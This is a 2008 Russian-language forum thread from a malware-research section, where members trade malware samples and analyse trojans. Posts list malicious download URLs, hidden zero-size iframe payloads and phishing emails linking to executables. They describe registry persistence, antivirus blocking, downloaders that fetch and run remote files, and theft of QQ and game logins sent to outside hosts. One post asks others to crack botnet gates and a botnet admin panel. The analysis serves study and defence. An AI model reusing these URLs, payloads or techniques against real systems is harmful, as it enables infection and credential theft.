Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых) |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
<< 1 ... 27 . 28 . 29 . 30 . 31 . 32 . 33 . 34 . 35 . 36 . 37 ... 47 . 48 . >> |
Посл.ответ | Сообщение |
|
Создано: 13 октября 2006 23:15 · Поправил: Модератор · Личное сообщение · #1 |
|
Создано: 03 апреля 2008 23:41 · Поправил: HOMEZ · Личное сообщение · #2 причем щас на живом нортоне2005 проверил, он из всех этих файлов что скачивает доунлоадер неприбил 5 ( bho, bhos, aadre, 0304, eagle ) обидно однако началось гдето на этом сайте thetextdesk.com/ www.iframe911.com/buyer/in.cgi через это оно както с сайта на сайт прыгало mortgages-4-all.com/check/versionl.php mortgages-4-all.com/check/n14041.htm << похоже на ява скрипт что тут на форуме уже расматривали abc-powers.com/check/vers195.php какойто лоадер truemaybe.com/check/n14042.htm << чтото аналогичное 195.93.219.206/sbm/index.php << чтото аналогичное winhex.org/tds/in.cgi ответил Error: 'can't open redirects.log file' 195.93.219.206/sbm/loader.exe lskdfjlerjvm.com/arm1/index.php lskdfjlerjvm.com/arm1/exe.php 195.93.219.206/sbm/exe.php 195.93.219.206/1stat/get_exa.php 195.93.219.206/1stat/get_exb.php 195.93.219.206/1stat/get_exc.php www.botsys.net/x.html самое веселое название возвращает нмпл с <iframe src="http://www.iframe911.com/buyer/in.cgi?VSE1" width="0" height="0"></iframe> <iframe src="http://www.iframe911.com/buyer/in.cgi?1mix1" width="0" height="0"></iframe> <iframe src="http://www.iframe911.com/buyer/in.cgi?proba" width="0" height="0"></iframe> <iframe src="http://www.iframe911.com/buyer/in.cgi?baa1" width="0" height="0"></iframe> |
|
Создано: 04 апреля 2008 01:09 · Личное сообщение · #3 |
|
Создано: 04 апреля 2008 15:06 · Личное сообщение · #4 |
|
Создано: 08 апреля 2008 19:45 · Поправил: Stack · Личное сообщение · #5 |
|
Создано: 08 апреля 2008 20:58 · Поправил: slip · Личное сообщение · #6 Stack пишет: Посмотрите кому не лень ( вари под рукой нет ). Пароль virus Вирь сто % Dr Web c последними базами не детектит. Ишел в комплекте с LdPinch http://slil.ru/25667737 http://slil.ru/25667737 Snatch add: а я читал один раз его описание где то в интернете, и мне название запомнилось - прямо по Гаю Ричи =) |
|
Создано: 09 апреля 2008 10:25 · Поправил: SLV · Личное сообщение · #7 |
|
Создано: 11 апреля 2008 21:10 · Поправил: [HEX] · Личное сообщение · #8 |
|
Создано: 11 апреля 2008 21:55 · Личное сообщение · #9 |
|
Создано: 16 апреля 2008 12:53 · Личное сообщение · #10 |
|
Создано: 16 апреля 2008 14:23 · Личное сообщение · #11 0x3a В сеть не видно чтобы ломился. Но файловые перетрубации автор вируса замутил огого =) нахрена не совсем понятно... В реестре прописывает себя чтобы стартовал автоматом + при запуске известных ему антивирусов, антитроянов и прочих утилит типа mconfig, regedit и пр. www.cwsandbox.org/?page=details&id=209854&password=yfzlh ----- Computer Security Laboratory |
|
Создано: 16 апреля 2008 19:11 · Поправил: Flint · Личное сообщение · #12 [HEX] пишет: В сеть не видно чтобы ломился. Недоглядел! Как мне кажется этот троян от китайских товарищей Создает свои копии: C:\WINDOWS\system32\severe.exe C:\WINDOWS\system32\.exe C:\WINDOWS\system32\drivers\.exe C:\WINDOWS\system32\drivers\conime.exe C:\WINDOWS\system32\verclsid.dat Записывается в Автозагрузку: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell "C:\WINDOWS\system32\drivers\conime.exe" HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "C:\WINDOWS\system32\severe.exe" Также в реестре записывает множество ключей, которые должны блокировать доступ к другим программам HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 360Safe.exe File not found: C:\WINDOWS\system32\drivers\.exe adam.exe File not found: C:\WINDOWS\system32\drivers\.exe avp.com File not found: C:\WINDOWS\system32\drivers\.exe avp.exe File not found: C:\WINDOWS\system32\drivers\.exe EGHOST.exe File not found: C:\WINDOWS\system32\drivers\.exe IceSword.exe File not found: C:\WINDOWS\system32\drivers\.exe iparmo.exe File not found: C:\WINDOWS\system32\drivers\.exe kabaload.exe File not found: C:\WINDOWS\system32\drivers\.exe KRegEx.exe File not found: C:\WINDOWS\system32\drivers\.exe KvDetect.exe File not found: C:\WINDOWS\system32\drivers\.exe KVMonXP.kxp File not found: C:\WINDOWS\system32\drivers\.exe KvXP.kxp File not found: C:\WINDOWS\system32\drivers\.exe MagicSet.exe File not found: C:\WINDOWS\system32\drivers\.exe mmsk.exe File not found: C:\WINDOWS\system32\drivers\.exe msconfig.com File not found: C:\WINDOWS\system32\drivers\.exe msconfig.exe File not found: C:\WINDOWS\system32\drivers\.exe NOD32.exe File not found: C:\WINDOWS\system32\drivers\.exe PFW.exe File not found: C:\WINDOWS\system32\drivers\.exe PFWLiveUpdate.exe File not found: C:\WINDOWS\system32\drivers\.exe QQDoctor.exe File not found: C:\WINDOWS\system32\drivers\.exe Ras.exe File not found: C:\WINDOWS\system32\drivers\.exe Rav.exe File not found: C:\WINDOWS\system32\drivers\.exe RavMon.exe File not found: C:\WINDOWS\system32\drivers\.exe regedit.com File not found: C:\WINDOWS\system32\drivers\.exe regedit.exe File not found: C:\WINDOWS\system32\drivers\.exe runiep.exe File not found: C:\WINDOWS\system32\drivers\.exe SREng.EXE File not found: C:\WINDOWS\system32\drivers\.exe TrojDie.kxp File not found: C:\WINDOWS\system32\drivers\.exe WoptiClean.exe File not found: C:\WINDOWS\system32\drivers\.exe Запускает: C:\WINDOWS\system32\.exe C:\WINDOWS\system32\severe.exe C:\WINDOWS\system32\drivers\conime.exe Создает и запускает батник: C:\WINDOWS\system32\hx1.bat @echo off set date=2004-1-22 ping ** localhost > nul date %date% del %0 1. Скачивает www.cd321.net/30w.txt в C:\WINDOWS\system32\dqhx1.txt Запускает Explorer.exe с параметрами записанными в dqhx1.txt =http://www.dvdforone.com/chcou.htm 2. Скачивает www.ctv163.com/admin/down.txt в C:\WINDOWS\system32\dqhx3.txt Скачивает в C:\WINDOWS\system32 тот файл, который был записан в dqhx3.txt = www.is123.cn/admin/qqniubi.exe Копирует этот файл в C:\WINDOWS\system32\qqniubi.exe, к имени файла добавляется "new", после чего запускается newqqniubi.exe Создает C:\WINDOWS\system32\.dll .dll ищет процесс с именем QQ.exe, далее удаляет какие-то файлы относящиеся к QQ.exe, после чего отправлятся данные о QQ.exe типа логина и пасса, куда х.з так и не понял дальше его исследовать надоело P.S QQ - популярный в Китае клиент мгновенного обмена сообщениями ----- Nulla aetas ad discendum sera |
|
Создано: 16 апреля 2008 19:23 · Личное сообщение · #13 |
|
Создано: 16 апреля 2008 20:12 · Личное сообщение · #14 |
|
Создано: 21 апреля 2008 12:24 · Личное сообщение · #15 |
|
Создано: 21 апреля 2008 13:01 · Личное сообщение · #16 |
|
Создано: 21 апреля 2008 13:45 · Поправил: Ara · Личное сообщение · #17 |
|
Создано: 21 апреля 2008 17:27 · Личное сообщение · #18 |
|
Создано: 21 апреля 2008 17:49 · Личное сообщение · #19 |
|
Создано: 21 апреля 2008 18:37 · Личное сообщение · #20 |
|
Создано: 29 апреля 2008 14:42 · Поправил: Flint · Личное сообщение · #21 Кто-нить может поломать гейты? www.surok.tu1.ru/gate/gate.php www.scorpinch.110mb.com/gate/gate.php uins-shop.1gb.in/gate/gate.php x-file.890m.com/gate/gate.php www.vano43.1gb.in/beerka/gate.php lolko23.110mb.com/gate/gate.php или админку ботнета candy-country.com/botcool/auth.php ----- Nulla aetas ad discendum sera |
|
Создано: 29 апреля 2008 16:09 · Личное сообщение · #22 |
|
Создано: 30 апреля 2008 11:48 · Личное сообщение · #23 До чего наглыми стали трояно/вирусо рассылатели, вот что приходит мне на мыло : Тема: Привет.... Оцени мои новые фотки ;)) От: Lenochka <skeetz@8thdeadlysim.com> Дата: 29 апреля 2008 17:00:00 Привет , Помнишь меня? ;)) В архиве мои новые фотки как ты просил... scavolinibari.it/My_foto.exe Целую, Твоя Леночка и такое же письмецо но уже с другого ящика: Тема: Привет.... Оцени мои новые фотки ;)) От: Lenochka <billing@aloha-cafe.net> Дата: 29 апреля 2008 17:01:00 Привет , Помнишь меня? ;)) В архиве мои новые фотки как ты просил... fnsa.com.ar/My_foto.exe Целую, Твоя Леночка Ясен красен что там не фотки а зверек сидит. ----- Don_t hate the cracker - hate the code. |
|
Создано: 30 апреля 2008 12:21 · Личное сообщение · #24 |
|
Создано: 30 апреля 2008 17:02 · Поправил: Flint · Личное сообщение · #25 mysterio пишет: Ясен красен что там не фотки а зверек сидит. Есть и симпатишная! Анпакнул я этот файлег, устанавливает через сервисы драйвер grande48.sys в C:\WINDOWS\system32\drivers, также в Temp создает батник "_it.bat" примерно такого содержания: :abc del "C:\Documents and Settings\Андрей\Рабочий стол\Dumped_.exe" if exist "C:\Documents and Settings\Андрей\Рабочий стол\Dumped_.exe" goto abc rmdir "C:\Documents and Settings\Андрей\Рабочий стол" del "C:\DOCUME~1\86A9~1\LOCALS~1\Temp\_it.bat" Чем занимается драйвер, х.з помоему он пошифрован, мож кто копнет дальше? На вирустотале большинство аверов сказали что это Srizbi Более подробное описание [url=http://safe.cnews.ru/bugtrack/entry/index.shtml?malicious/2007/06 /20/101142 ]--> тут <--[/url] a055_30.04.2008_CRACKLAB.rU.tgz - grande48.rar ----- Nulla aetas ad discendum sera |
|
Создано: 08 мая 2008 17:47 · Личное сообщение · #26 |
|
Создано: 08 мая 2008 20:47 · Личное сообщение · #27 |
|
Создано: 13 мая 2008 21:37 · Личное сообщение · #28 зацените файлег. подозрение на пенча, но сумневаюсь. если пенч то скажите кейлоги вёл или нет, ибо я его запустил. пасс: 1 d9d2_13.05.2008_CRACKLAB.rU.tgz - svchоst.rar ----- AutoIt |
|
Создано: 13 мая 2008 22:10 · Поправил: Hellspawn · Личное сообщение · #29 ищет на рабочем столе, в программах, потом на всех хардах ASCII "L2.EXE" суда стучит _ttp://real-adena.ru/new/fgdhhj.php?login= если ничего не найдено, то удаляется батником. запакованно по-моему от глоффа криптором з.ы. а если найдено, я не посмотрел, толи пассы тянет, толи ещё что)) ----- [nice coder and reverser] |
|
Создано: 13 мая 2008 22:13 · Личное сообщение · #30 |
|
Создано: 13 мая 2008 22:25 · Поправил: bad_boy · Личное сообщение · #31 OLEGator пишет: зацените файлег. подозрение на пенча, но сумневаюсь. если пенч то скажите кейлоги вёл или нет, ибо я его запустил. Это не пинч. В нэт не лезет. Может мне и показалось, но кажется он удалет LineAge2 с компа(exe и updates) создаёт батник, пишетя в реестр, копирается в папку с виндой оеп: 405E60 зы. судя по сообщению Hellspawn, там ещё что-то покриптованно |
<< 1 ... 27 . 28 . 29 . 30 . 31 . 32 . 33 . 34 . 35 . 36 . 37 ... 47 . 48 . >> |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
Эта тема закрыта. Ответы больше не принимаются. |